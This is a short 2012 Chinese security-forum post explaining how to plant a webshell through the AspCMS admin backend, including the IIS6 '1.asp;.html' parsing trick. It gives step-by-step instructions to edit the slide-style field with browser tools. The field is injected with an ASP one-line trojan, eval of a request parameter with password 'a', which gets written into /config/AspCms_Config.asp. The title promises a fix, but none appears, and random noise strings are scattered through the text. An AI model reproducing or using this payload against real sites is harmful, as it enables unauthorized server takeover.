找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2193|回复: 0
打印 上一主题 下一主题

aspcms后台拿shell漏洞(非添加模块)及修复方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:55:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.0 W& q$ A  D8 q/ u- X- F
1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”
) i- {) n2 E4 i' y# K  z8 r  u5 Q3 y* K8 L, _8 Z

6 l/ g/ Z3 S6 L( V* c- o: }9 U3 Y5 ?# d
2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%
2 r4 @% z8 r2 [! r) V& X1 H) }/ ]) x3 Y+ {

( Y4 [2 @2 g# ^# K: g3、一句话木马,密码a。在/config/AspCms_Config.asp# w- w9 X7 a$ A9 o. i' Y0 M) _
! W+ Q9 E0 k) v+ J- }
5 w5 m/ A; J$ @" K  Z8 R7 |- B  A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表